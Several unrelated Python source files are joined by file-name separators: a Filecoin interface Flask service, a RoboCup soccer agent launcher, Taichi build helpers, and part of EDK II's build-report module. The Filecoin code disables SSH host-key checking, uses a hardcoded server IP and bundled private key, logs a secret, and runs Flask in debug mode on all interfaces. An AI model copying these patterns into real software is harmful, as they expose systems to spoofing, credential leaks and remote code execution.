scp_thread = Thread(target=scp_image, args=(
"upload", image_name, storage_duration, miner_address))
scp_thread.start()
status = "Started scp upload"
status_code = 200
else:
image_name = request.args.get('imageName')
image_hash = request.args.get('imageHash')
miner_address = request.args.get('minerAddress')
payload = {"imageName": image_name, "imageHash": image_hash,
"minerAddress": miner_address, "ipAddress": EDGE_IP_ADDRESS}
communicate_backend("get_image", payload)
status = f"requested image: {image_name} with hash: {image_hash} from the filecoin network"
status_code = 200
return status, status_code
#### END OF API ######### END OF API ######### END OF API ######### END OF API ######### END OF API #####
@app.route('/filecoin_interface/health', methods=['GET'])
def filecoin_interface_health():
return "Filecoin Interface v0.1", 200
def communicate_orchestrator(topic, datum):
# topic = image_commited, image_stored, image_downloaded
# Inform orchestrator that image has been commited
# Inform orchestrator that image has been stored in the network
# Inform orchestrator that image has been downloaded
orchestrator_url = "http://localhost:" + PORT + "/orchestrator/"
datum["status"] = topic
if topic == "downloaded":
orchestrator_url = orchestrator_url + "service_provider/image/status"
else: # topic = stored, committed
orchestrator_url = orchestrator_url + "service_customer/image/status"
payload_str = json.dumps(datum, indent=4)
print(
f" Filecoin Interface -- communicate_orchestrator(), request: {payload_str}")
req = requests.post(orchestrator_url, json=datum)
print(
f" Filecoin Interface -- Communicate_orchestrator(), response: {req}")
return req.status_code
def communicate_backend(topic, datum):
# topic = get_image, store_image
payload = {"id": ID, "secret": SECRET, "data": datum}
payload_str = json.dumps(payload, indent=4)
print(
f" Filecoin Interface -- Sending request to backend with payload: {payload_str}")
req = requests.post(CLOUD_HOST + "/" + topic, json=payload)
print(f" Filecoin Interface -- Response from backend: {req}")
return req.status_code
def scp_image(action, image_name, argument1, argument2):
path = "/home/ubuntu/filecoin_images/"
if action == "download":
command_part_1 = "ubuntu@150.140.184.241:" + path + image_name
command_part_2 = os.getcwd() + "/data/images"
command_part_3 = os.getcwd() + "/data/odyslam_ubuntu.pem"
print("\n### SCP PROCESS START ###")
p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no',"-i", command_part_3, command_part_1, command_part_2])
return_code = p.wait()
print("### SCP END ####")
if return_code != 0:
print(f"Filecoin Interface -- scp produced error {return_code}")
return 1
else:
print(f"Filecoin Interface -- file with {image_name} was downloaded using scp")
payload = {"imageHash": argument1, "imageName": image_name}
communicate_orchestrator("downloaded", payload)
# As soon as image is downloaded, inform orchestrator so as to acquire it
elif action == "upload":
print("\n### SCP PROCESS START (new version0) ###\n")
command_part_2 = "ubuntu@150.140.184.241:" + path
command_part_1 = os.getcwd() + "/data/images/" + image_name
command_part_3 = os.getcwd() + "/data/odyslam_ubuntu.pem"
p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no', "-i",command_part_3,command_part_1, command_part_2])
return_code = p.wait()
print("### SCP END ####")
if return_code != 0:
print(f"Filecoin Interface -- scp produced error {return_code}")
return 1
else:
print(f"Filecoin Interface -- file with {image_name} was uploaded using scp")
payload = {"duration": argument1, "imageName": image_name, "minerAddress": argument2, "ipAddress": EDGE_IP_ADDRESS}
communicate_backend("store_image", payload)
# As soon as image is uploaded to the remote server, inform backend
# so as to start upload to filecoin network
else:
print("Wrong command for scp")
return 0
# def scp_image(action, image_name, argument):
# path = "/home/ubuntu/filecoin_images/"
# if action == "download":
# command_part_1 = "ubuntu@150.140.184.241:" + path + image_name
# command_part_2 = os.getcwd() + "data/images"
# command_part_3 = "-i " + os.getcwd() + "/data/odyslam_ubuntu.pem"
# print("\n### SCP PROCESS START ###")
# # p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no','-o UserKnownHostsFile=/dev/null',command_part_3, command_part_1, command_part_2])
# # return_code = p.wait()
# time.sleep(4)
# print("...File sent")
# print("### SCP END ####")
# # if return_code != 0:
# # print(f"Filecoin Interface -- scp produced error {return_code}")
# # return 1
# # As soon as image is downloaded, inform orchestrator
# # so as to acquire it
# payload = {"imageHash": argument, "imageName": image_name}
# communicate_orchestrator("downloaded", payload)
# elif action == "upload":
# print("\n### SCP PROCESS START ###\n")
# return_value = os.system("scp -o StrictHostKeyChecking=no -i /usr/src/app/data/odyslam_ubuntu.pem /usr/src/app/data/images/hello.txt ubuntu@150.140.184.241:/home/ubuntu/filecoin_images/")
# print(return_value)
# command_part_2 = "ubuntu@150.140.184.241:" + path
# command_part_1 = os.getcwd() + "data/images/" + image_name
# command_part_3 = "-i " + os.getcwd() + "/data/odyslam_ubuntu.pem"
# p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no','-o UserKnownHostsFile=/dev/null', command_part_3,command_part_1, command_part_2])
# return_code = p.wait()
# print(return_code)
# print("### SCP END ####")
# # if return_code != 0:
# # print(f"Filecoin Interface -- scp produced error {return_code}")
# # return 1
# # As soon as image is uploaded to the remote server, inform backend
# # so as to start upload to filecoin network
# payload = {"duration": argument, "imageName": image_name}
# communicate_backend("store_image", payload)
# else:
# print("Wrong command for scp")
# return 0
####### Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface #######
def register_health():
while True:
try:
url = "http://edgex-core-consul:8500/v1/agent/service/register?replace-existing-checks=1"
payload = {
"ID": "filecoin",
"Name": "Filecoin Inteface",
"Port": 80,
"EnableTagOverride": False,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"HTTP": "http://orchestrator:" + PORT + "/filecoin_interface/health",
"Interval": "125s",
},
"Weights": {
"Passing": 10,
"Warning": 1
}
}
req = requests.put(url, json=payload)
print(f"Filecoin Service registered with Consul. Response: {req}")
payload = {
"ID": "orchestrator",
"Name": "Orchestrator",
"Port": 80,
"EnableTagOverride": False,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"HTTP": "http://orchestrator:" + PORT + "/orchestrator/health",
"Interval": "120s",
},
"Weights": {
"Passing": 10,
"Warning": 1
}
}
req = requests.put(url, json=payload)
print(f"Orchestrator Service registered with Consul. Response: {req}")
break
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
print(f"Register Health: got exception:{e}, retrying in 20s")
time.sleep(20)
if __name__ == '__main__':
orchestrator = Orchestrator()
thread = Thread(target = register_health)
thread.start()
app.run(host='0.0.0.0', port=PORT, debug=True)
|
main.py
|
#!/usr/bin/env python
import threading
import time
import random
import sys
import multiprocessing as mp
import os
# import agent types (positions)
from aigent.soccerpy.agent import Agent as A0
# strikers
from aigent.agent_1 import Agent as A1
# defenders
from aigent.agent_2 import Agent as A2
# goalie
from aigent.agent_3 import Agent as A3
# set team
TEAM_NAME = 'Keng'
NUM_PLAYERS = 5
if __name__ == "__main__":
# return type of agent: midfield, striker etc.
def agent_type(position):
return {
2: A1,
3: A1,
4: A1,
6: A1,
7: A1,
8: A1,
}.get(position, A1)
# spawn an agent of team_name, with position
def spawn_agent(team_name, position):
"""
Used to run an agent in a seperate physical process.
"""
# return type of agent by position, construct
a = agent_type(position)()
a.connect("localhost", 6000, team_name)
a.play()
# we wait until we're killed
while 1:
# we sleep for a good while since we can only exit if terminated.
time.sleep(1)
# spawn all agents as seperate processes for maximum processing efficiency
agentthreads = []
for position in xrange(1, NUM_PLAYERS+1):
print " Spawning agent %d..." % position
at = mp.Process(target=spawn_agent, args=(TEAM_NAME, position))
at.daemon = True
at.start()
agentthreads.append(at)
print "Spawned %d agents." % len(agentthreads)
print
print "Playing soccer..."
# wait until killed to terminate agent processes
try:
while 1:
time.sleep(0.05)
except KeyboardInterrupt:
print
print "Killing agent threads..."
# terminate all agent processes
count = 0
for at in agentthreads:
print " Terminating agent %d..." % count
at.terminate()
count += 1
print "Killed %d agent threads." % (count - 1)
print
print "Exiting."
sys.exit()
|
util.py
|
import atexit
import os
import shutil
import sys
import ctypes
if sys.version_info[0] < 3 or sys.version_info[1] < 5:
print("\nPlease restart with python3. \n(Taichi supports Python 3.6+)\n")
print("Current version:", sys.version_info)
exit(-1)
tc_core = None
def in_docker():
if os.environ.get("TI_IN_DOCKER", "") == "":
return False
else:
return True
def import_tc_core():
global tc_core
old_flags = sys.getdlopenflags()
sys.setdlopenflags(258) # 258 = RTLD_NOW | RTLD_GLOBAL
# We
import taichi_core as core
tc_core = core
sys.setdlopenflags(old_flags)
def is_ci():
return os.environ.get('TC_CI', '') == '1'
def package_root():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')
def is_release():
return os.environ.get('TAICHI_REPO_DIR', '') == ''
from colorama import Fore, Back, Style
def get_core_shared_object():
if is_release():
directory = os.path.join(package_root(), 'lib')
else:
directory = get_bin_directory()
return os.path.join(directory, 'libtaichi_core.so')
def get_repo():
from git import Repo
import taichi as tc
repo = Repo(tc.get_repo_directory())
return repo
def print_red_bold(*args, **kwargs):
print(Fore.RED + Style.BRIGHT, end='')
print(*args, **kwargs)
print(Style.RESET_ALL, end='')
def format():
import os
import taichi as tc
from yapf.yapflib.yapf_api import FormatFile
repo = get_repo()
print('* Formatting code', end='')
for item in repo.index.diff('HEAD'):
fn = os.path.join(tc.get_repo_directory(), item.a_path)
print(end='.')
if fn.endswith('.py'):
FormatFile(
fn,
in_place=True,
style_config=os.path.join(tc.get_repo_directory(), '.style.yapf'))
if fn.endswith('.cpp'):
os.system('clang-format -i -style=file {}'.format(fn))
repo.git.add(item.a_path)
print('* Done!')
from taichi.misc.settings import get_output_directory, get_build_directory, get_bin_directory, get_repo_directory, get_runtime_directory
from taichi.misc.util import get_os_name, get_unique_task_id
CREATE_SAND_BOX_ON_WINDOWS = True
def build():
tmp_cwd = os.getcwd()
bin_dir = get_build_directory()
try:
os.mkdir(bin_dir)
except:
pass
os.chdir(bin_dir)
flags = ' -DPYTHON_EXECUTABLE:FILEPATH="{}"'.format(sys.executable)
print('Running cmake...')
if is_ci():
print(' Note: building for CI. SIMD disabled.')
flags += ' -DTC_DISABLE_SIMD:BOOL=1'
if get_os_name() == 'win':
flags += ' -G "Visual Studio 15 Win64"'
cmake_ret = os.system('cmake .. ' + flags)
if cmake_ret != 0:
print(' Error: CMake failed.')
exit(-1)
import multiprocessing
print('Building taichi...')
num_make_threads = min(20, multiprocessing.cpu_count())
if get_os_name() == 'win':
make_ret = os.system("msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln")
else:
make_ret = os.system('make -j {}'.format(num_make_threads))
if make_ret != 0:
print(' Error: Build failed.')
exit(-1)
os.chdir(tmp_cwd)
if is_release():
print("[Release mode]")
sys.path.append(os.path.join(package_root(), 'lib'))
link_src = os.path.join(package_root(), 'lib', 'taichi_core.so')
link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so')
if not os.path.exists(link_dst):
os.symlink(link_src, link_dst)
import_tc_core()
# For llvm jit to find the runtime symbols
dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_GLOBAL)
tc_core.set_python_package_dir(package_root())
os.makedirs(tc_core.get_repo_dir(), exist_ok=True)
else:
if get_os_name() == 'osx':
bin_dir = get_bin_directory()
os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory()
if not os.path.exists(os.path.join(bin_dir, 'libtaichi_core.dylib')):
build()
tmp_cwd = os.getcwd()
os.chdir(bin_dir)
shutil.copy('libtaichi_core.dylib', 'taichi_core.so')
sys.path.append(bin_dir)
import taichi_core as tc_core
os.chdir(tmp_cwd)
elif get_os_name() == 'linux':
bin_dir = get_bin_directory()
if 'LD_LIBRARY_PATH' in os.environ:
os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/'
else:
os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/'
if not os.path.exists(os.path.join(bin_dir, 'libtaichi_core.so')):
build()
tmp_cwd = os.getcwd()
os.chdir(bin_dir)
sys.path.append(bin_dir)
# https://stackoverflow.com/questions/3855004/overwriting-library-file-causes-segmentation-fault
if os.path.exists('taichi_core.so'):
try:
os.unlink('taichi_core.so')
except:
print('Warning: taichi_core.so already removed. This may be caused by'
'simultaneously starting two taichi instances.')
pass
shutil.copy('libtaichi_core.so', 'taichi_core.so')
try:
import_tc_core()
except Exception as e:
from colorama import Fore, Back, Style
print_red_bold("Taichi core import failed: ", end='')
print(e)
exit(-1)
os.chdir(tmp_cwd)
elif get_os_name() == 'win':
bin_dir = get_bin_directory()
dll_path1 = os.path.join(bin_dir, 'Release', 'taichi_core.dll')
dll_path2 = os.path.join(bin_dir, 'libtaichi_core.dll')
if not os.path.exists(dll_path1) and not os.path.exists(dll_path2):
build()
# On windows when an dll/pyd is loaded, we can not write to it any more
old_wd = os.getcwd()
os.chdir(bin_dir)
if CREATE_SAND_BOX_ON_WINDOWS:
# Create a sandbox for separated core lib development and loading
dir = os.path.join(get_output_directory(), 'tmp', get_unique_task_id())
lib_dir = os.path.join(get_repo_directory(), 'external', 'lib')
os.environ['PATH'] += ';' + lib_dir
os.makedirs(dir)
if os.path.exists(dll_path1):
shutil.copy(dll_path1, os.path.join(dir, 'taichi_core.pyd'))
else:
shutil.copy(dll_path2, os.path.join(dir, 'taichi_core.pyd'))
os.environ['PATH'] += ';' + dir
sys.path.append(dir)
else:
shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd'))
sys.path.append(bin_dir)
try:
import taichi_core as tc_core
except Exception as e:
print(e)
print()
print('Is taichi\external\lib correctly set to branch msvc or mingw?')
print()
raise e
os.chdir(old_wd)
def get_dll_name(name):
if get_os_name() == 'linux':
return 'libtaichi_%s.so' % name
elif get_os_name() == 'osx':
return 'libtaichi_%s.dylib' % name
elif get_os_name() == 'win':
return 'taichi_%s.dll' % name
else:
assert False, "Unknown OS"
def load_module(name, verbose=True):
if verbose:
print('Loading module', name)
try:
if get_os_name() == 'osx':
mode = ctypes.RTLD_LOCAL
else:
mode = ctypes.RTLD_GLOBAL
if '.so' in name:
ctypes.PyDLL(name, mode=mode)
else:
ctypes.PyDLL(
os.path.join(get_repo_directory(), 'build',
get_dll_name(name)), mode=mode)
except Exception as e:
print(Fore.YELLOW + "Warning: module [{}] loading failed: {}".format(
name, e) + Style.RESET_ALL)
def at_startup():
if not is_release():
output_dir = get_output_directory()
if not os.path.exists(output_dir):
print('Making output directory')
os.mkdir(output_dir)
# Load modules
# load_module('lang_core')
tc_core.set_core_state_python_imported(True)
def start_memory_monitoring(output_fn, pid=-1, interval=1):
# removing dependency on psutil
return
import os, psutil, time
if pid == -1:
pid = os.getpid()
import multiprocessing
def task():
with open(output_fn, 'w') as f:
process = psutil.Process(pid)
while True:
try:
mem = process.memory_info().rss
except:
mem = -1
time.sleep(interval)
print(time.time(), mem, file=f)
f.flush()
proc = multiprocessing.Process(target=task, daemon=True)
proc.start()
@atexit.register
def clean_libs():
pass
at_startup()
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.ModuleAutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.append(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}') and not Value.startswith("{CODE("):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(gEndOfLine, TAB_LINE_BREAK).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
